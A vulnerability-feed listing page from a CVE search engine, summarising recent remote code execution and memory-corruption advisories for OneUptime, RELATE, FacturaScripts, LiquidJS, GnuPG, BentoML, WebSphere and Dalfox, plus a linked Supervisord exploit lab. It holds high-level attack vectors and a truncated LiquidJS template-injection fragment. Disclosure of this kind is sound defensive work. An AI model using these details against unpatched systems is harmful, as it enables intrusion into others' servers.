CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

Vulnrichment•added 2026/05/27 6:50 p.m.•8 views

CVE-2026-45102 OneUptime: RCE due to Node.js' vm module escape via error objects and infinite recursion

OneUptime is an open-source monitoring and observability platform. Prior to 10.0.98, OneUptime uses the Node.js' vm module as an isolation primitive. This API was not designed for that and can be escaped via error objects and infinite recursion. This vulnerability is fixed in 10.0.98...

9.9CVSS5.8AI score0.00062EPSS

GithubExploit•added 2026/05/27 6:44 p.m.•61 views

Exploit for Incorrect Default Permissions in Supervisord Supervisor

LAB 3 — Supervisord XML-RPC Remote Code Execution CVE-2017-11...

9CVSS7.7AI score0.94239EPSS

Exploits10

Vulnrichment•added 2026/05/27 6:31 p.m.•8 views

CVE-2026-47161 RELATE Vulnerable to Remote Code Execution (RCE) via Insecure Celery Pickle Deserialization

RELATE is a web-based courseware package. Prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb, RELATE LMS configures its Celery workers to accept and deserialize untrusted 'pickle' data. An attacker who can reach the message broker can execute arbitrary commands on the host server. Combined...

Cvelist•added 2026/05/27 6:31 p.m.•45 views

CVE-2026-47161 RELATE Vulnerable to Remote Code Execution (RCE) via Insecure Celery Pickle Deserialization

8.7CVSS0.00607EPSS

ATTACKERKB•added 2026/05/27 6:31 p.m.•5 views

CVE-2026-47161

EUVD•added 2026/05/27 6:31 p.m.•14 views

Exploits0References3

EUVD-2026-32628

CVE•added 2026/05/27 6:31 p.m.•12 views

CVE-2026-47161

RELATE is affected by CVE-2026-47161 due to Celery workers configured to deserialize untrusted pickle data prior to commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb. An attacker who can reach the message broker can execute arbitrary commands on the host, and due to insufficient network isolation i...

Vulnrichment•added 2026/05/27 6:29 p.m.•9 views

CVE-2026-42879 FacturaScripts: Authenticated Remote Code Execution (RCE) via GIF Image Upload in Product Images

FacturaScripts is an open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image using...

6.3CVSS5.8AI score0.00046EPSS

CVE•added 2026/05/27 6:29 p.m.•14 views

CVE-2026-42879

CVE-2026-42879 affects FacturaScripts

6.3CVSS5.8AI score0.00046EPSS

Cvelist•added 2026/05/27 6:29 p.m.•38 views

CVE-2026-42879 FacturaScripts: Authenticated Remote Code Execution (RCE) via GIF Image Upload in Product Images

6.3CVSS0.00046EPSS

Github Security Blog•added 2026/05/27 6:24 p.m.•55 views

LiquidJS is Vulnerable to Remote Code Execution

Summary It is possible to execute arbitrary code with crafted templates Details 1|valueOf - this when evaluating the filter liquid %assign r=1|valueOf% r|inspect json...

6.2AI score

Exploits0References3Affected Software1

OSV•added 2026/05/27 6:24 p.m.•14 views

GHSA-GF2Q-C269-PQGC LiquidJS is Vulnerable to Remote Code Execution

Summary It is possible to execute arbitrary code with crafted templates Details 1|valueOf - this when evaluating the filter liquid %assign r=1|valueOf% r|inspect json...

10CVSS6.2AI score

Exploits0References3

OSV•added 2026/05/27 6:18 p.m.•6 views

JLSEC-2026-564 In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized...

In GnuPG before 2.5.17, a crafted CMS S/MIME EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of service; however, there is also memory corruption that...

8.1CVSS6.6AI score0.00227EPSS

Exploits1References4

PyPA•added 2026/05/27 6:16 p.m.•5 views

PYSEC-0000-CVE-2026-44345

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, src/bentoml/internal/container/frontend/dockerfile/templates/basev2.j2 interpolates docker.baseimage raw with no escaping, newline filtering, or validation. A malicious...

8.8CVSS5.9AI score0.00046EPSS

Exploits1References1Affected Software1

NVD•added 2026/05/27 6:16 p.m.•7 views

CVE-2026-44345

8.8CVSS0.00046EPSS

Exploits1References1

IBM Security Bulletins•added 2026/05/27 6:9 p.m.•13 views

Security Bulletin: IBM WebSphere Application Server and WebSphere Application Server Liberty are affected by multiple vulnerabilities when using Web Server Plug-ins (CVE-2026-8633, CVE-2026-8620)

Summary IBM WebSphere Application Server and WebSphere Application Server Liberty are affected by remote code execution and HTTP request smuggling when using the optional and separately installable Web Server Plug-ins for IBM WebSphere Application Server component. Vulnerability Details...

9.8CVSS6.5AI score0.0026EPSS

Exploits0Affected Software1

Vulnrichment•added 2026/05/27 5:34 p.m.•7 views

CVE-2026-45087 Dalfox: Unauthenticated Remote Code Execution via `found-action` in Dalfox Server Mode

Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, when dalfox is started in REST API server mode dalfox server, the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options...

10CVSS6AI score0.00061EPSS

CVE•added 2026/05/27 5:34 p.m.•5 views

CVE-2026-45087

Dalfox (server mode) prior to v2.13.0 is vulnerable to unauthenticated remote code execution. When running dalfox server with default 0.0.0.0:6664 and no API key, POST /scan deserializes attacker-controlled options (FoundAction and FoundActionShell) into scan config, then shell commands are execu...

10CVSS6AI score0.00061EPSS